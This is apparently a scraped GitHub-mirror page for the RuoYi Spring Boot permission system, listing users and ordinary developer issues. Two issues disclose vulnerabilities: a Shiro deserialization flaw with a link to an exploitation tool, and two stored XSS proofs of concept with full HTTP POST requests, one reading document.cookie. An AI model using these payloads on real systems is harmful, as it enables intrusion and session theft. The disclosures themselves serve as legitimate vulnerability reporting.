lerry903 / ruoyi Goto Github PK
View Code? Open in Web Editor NEW基于SpringBoot2.1的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
Home Page: http://www.ruoyi.vip
License: Apache License 2.0
ruoyi's People
Contributors
Stargazers
Watchers
Forkers
liutengfei123 jcookies crazyshare winmin86 xumingfei yunshitiger liupeng110112 wangzbing yanqiuqiu andy521 bnmyni innocence-y lwuuu jordonzhu balzaron wfq01 jessicacherish himoutoumaru erik5169 xtonghot 929359291 scarfaceyang fxiaonan lovezhike hisoka123 kv2014 hhy5277 zhangxw425 liueast xinfz la1995 pikejun xieyang313 wanghuiyao hellnxue hsongx ruanfeixiong comingcn2014 netwolf712 luonaibin lidujuan eggbucket thinksee alihock yach007 diffblue-benchmarks shawn2046 huangjian811 gonnana moocstudent 923325596 85668869 zhonglh 979236867 lilu54321 wmktz1 lwneighbor z1019918452 tbehappy xutaowin vernezhong fi3estudy tgy616 jackyxian daniel-chen404 jiandanfeng janloong-doo hardermen daodaoguang zol1006 dacer250 dappnbs heyu9258 joebeckham 914423503 karthurl smudkey 942435655 shaolin-liu nivenqi happyminchao muker-yng yidardd qqjgalaxy yuanjkkang tong2 yyxiao toryren breezelk 435732793 dwjisaboy hejun5448 lukysmile lkemin lynn831 mystartdream dewey00 everestjoo jhhe66 budding888ruoyi's Issues
我想问问@Excel的注解怎么实现当前导出的列名位于EXCEL文档的最后?
目前出现的情况是remark一旦加上@Excel就会出现列名位于EXCEL的第一列,求大神赐教学习
bootstrap table 双击编辑时报错
function queryUserList() {
var options = {
url: prefix + "/list",
createUrl: prefix + "/add",
updateUrl: prefix + "/edit/{id}",
removeUrl: prefix + "/remove",
exportUrl: prefix + "/export",
modalName: "监控-字典对应",
showExport: false,
pagination: false,
sortName: 'srot',
sortOrder: 'asc',
striped: true,
showRefresh: false,
uniqueId:"id",
//onDblClickCell: onDblClickCell,
onDblClickCell: onDblClickCell,
columns: [{
checkbox: false
},
{
field : 'id',
title : '',
visible: false
},
{
field : 'xmmc',
title : '项目名称',
sortable: true
},
{
field : 'xmbm',
title : '项目编码',
sortable: true
},
{
field : 'zdmc',
title : '字段名称',
sortable: true
},
{
field : 'zdbm',
title : '字典编码',
sortable: true
},
{
field : 'dyzdmc',
title : '对应字段名称',
sortable: true
},
{
field : 'dyzdbm',
title : '对应字段编码',
sortable: true
},
{
title: '操作',
align: 'center',
formatter: function(value, row, index) {
var actions = [];
// actions.push('<a class="btn btn-success btn-xs ' + editFlag + '" href="javascript:void(0)" onclick="$.operate.edit(\'' + row.id + '\')"><i class="fa fa-edit"></i>编辑</a> ');
// actions.push('<a class="btn btn-danger btn-xs ' + removeFlag + '" href="javascript:void(0)" onclick="$.operate.remove(\'' + row.id + '\')"><i class="fa fa-remove"></i>删除</a>');
var aStr1 = "<a onclick='syncClick(" + index + "," + row.id +")'><i class=\"fa fa-edit\"></i>同步</a> ";
var aStr = "<a onclick='addDy(" + index + "," + row.id +")'>新增对应关系</a> ";
var aStr2="";
if(row.sfxzdygx!='1'){
var aStr2 = "<a onclick='del(" + index + "," + row.id +")' shiro:hasPermission=\"system:tEhrJkZddy:remove\">删除</a>"
}
//actions.push('<a onclick="addDy(\'' + tEhrJkMain, '\' + \'' + row.id + '\')">新增对应关系</a>')
actions.push(aStr1);
actions.push(aStr);
actions.push(aStr2);
return actions.join('');
}
}
]
};
$.table.init(options);
}
function onDblClickCell(field, value, row, $element){
$.operate.edit(row.id);
}
/**
* @param {点击列的 field 名称} field
* @param {点击列的 value 值} value
* @param {点击列的整行数据} row
* @param {td 元素} $element
*/
function onDblClickCell(field, value, row, $element) {
if(field == 'dyzdmc' || field == 'dyzdbm') {
$element.attr('contenteditable', true);
$element.blur(function () {
var index = $element.parent().data('index');
var tdValue = $element.html();
saveData(index, field, tdValue, row);
})
}else{
$.modal.alertError('只能修改对应字段名称和对应字段编码');
}
}
gateway启动报错问题
Action:
Consider defining a bean of type 'org.springframework.http.codec.ServerCodecConfigurer' in your configuration.
多环境org.quartz-scheduler配置问题
我们开发环境和测试环境用的数据库是一起的,但是开发环境的定时器有时候会和测试环境的定时器一起运行,导致出现一些问题,通过百度搜索,用scheduling.enabled=false配置在配置文件上也是没有生效的,有没有什么好的办法解决多环境定时器共同运行的问题
二级菜单点击失效
Describe the bug (描述 Bug)
二级菜单点击失效,我搞了一晚上了,求助!!!
A clear and concise description of what the bug is.
我在项目里写了一个商城公共头,并没有使用后台的东西,后台也没有引用我的东西。
这些都不是关键,关键是我按照代码规范写了一个api,
import { getShopUserInfo, getAllCount } from '@/api/shopCommon'这样导入之后代码可以运行,没有报错,也能从后台拿到数据。
但是这行代码却影响到了后台的二级菜单,点击失效。
一级菜单却没有失效,点击可以显示内容。
我百思不得其解,路由从头看了个遍,也没有看出个头头来。
To Reproduce (重现步骤)
Steps to reproduce the behavior:
详细代码如下 略有删减,以便检查
/src/views/Shop/GloabalHeader/GloabalHeader.vue
import { userInfo, allCount } from '@/api/shop/common'
export default {
name: 'GlobalHeader',
methods: {
async getUserInfo () {
await userInfo().then(res => {
const location = res.data.loginIp
const name = res.data.userName
const depart = res.data.deptName
this.location = location
this.name = name
this.depart = depart
})
},
async refreshAllCount () {
await allCount().then(res=>{
const myselectCount = res.data.myselectCount
const myRecomCount = res.data.myRecomCount
const myOrderFormCount = res.data.myOrderFormCount
const mySubscribeCount = res.data.mySubscribeCount
this.myselectCount = myselectCount
this.myRecomCount = myRecomCount
this.myOrderFormCount = myOrderFormCount
this.mySubscribeCount = mySubscribeCount
})
}
}
}/src/views/Shop/GloabalHeader/index.js
import GlobalHeader from './GlobalHeader'
export default GlobalHeader/src/api/shop/common.js
import { shopAxios } from '@/utils/request'
const api = {
userInfo:"/shop/index/loginUserInfo",
allCount:'/shop/index/allCount'
}
export function userInfo(){
return shopAxios({
url:api.userInfo,
method:'get'
})
}
export function allCount(){
return shopAxios({
url:api.allCount,
method:'get'
})
}版本库地址:待...
normal一级菜单
在二级路由下添加三级路由
在二级路由页面有一个点击查看详情进入三级路由界面,如何添加路由,并且不在侧边导航栏上显示,且面包屑会记录上一级路由
quartz :SysJobServiceImpl 初始化时缺少事务
新增用户保存时,一直出现正在处理中,请稍后,其实保存是成功的
ry-ui.js?v=4.0.0:1027 Uncaught TypeError: Cannot read property 'contentWindow' of undefined
at Object.successTabCallback (ry-ui.js?v=4.0.0:1027)
at Object.success (ry-ui.js?v=4.0.0:968)
at j (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at x (jquery.min.js:4)
at XMLHttpRequest. (jquery.min.js:4)
前端项目在哪里
前端项目在哪里,文档里没看到
多线程时 shiro session 与 springboot内置Tomcat session 的cookie名冲突
在使用多线程的过程中,偶尔会出现报错:
org.apache.shiro.session.UnknownSessionException: There is no session with id [800e3201-637e-4c7b-988a-b73dc7b13d4b]
用户其他功能是正常使用的,维度多线程时错误。
ShiroConfig 类是否设置shiro session的cookie 名
排序工具类isAsc初值未设置成功
排序工具类isAsc初值未设置成功
Wrong code modification leads to Shiro deserialization vulnerability
The cause of the vulnerability
The project uses shiro1.7.0 version, this version should not have this vulnerability;
Code layer troubleshooting:
- The default key is used (one of the reasons for this vulnerability)
- From the point of view of the exploited gadget, the commonscollection exploit chain is used (the second reason for this vulnerability), and the commons-collections vulnerability should use version 3.2.2 and above
- Check shiro related calling code:
The Shiro deserialization vulnerability is caused by calling the getRememberedSerializedIdentity() function of the CookieRememberMeManager class. The official repair code is as follows, the repair plan is to delete the CookieRememberMeManager class
The CookieRememberMeManager class was added when the open source project was rewritten, which led to the generation of vulnerabilities.
Exploit:
You can use the following tools to exploit this vulnerability, Github project: https://github.com/j1anFen/shiro_attack
Execute system commands
There is two XSS vulnerability
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alertxss</SCript>
there is post package:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
noticeId=10¬iceTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E¬iceType=1¬iceContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
there is post package:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A¶ms%5BparentMenuId%5D=¶ms%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=¶ms%5BtreeCode%5D=¶ms%5BtreeParentCode%5D=¶ms%5BtreeName%5D=
UserAgentUtils内存溢出
eu.bitwalker.UserAgentUtils
建议溢出不可信的第三方jar,未经过实践的jar包总是会出现各种问题。
后端接口跨域
博主的后端服务是否支持跨域访问呢?
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.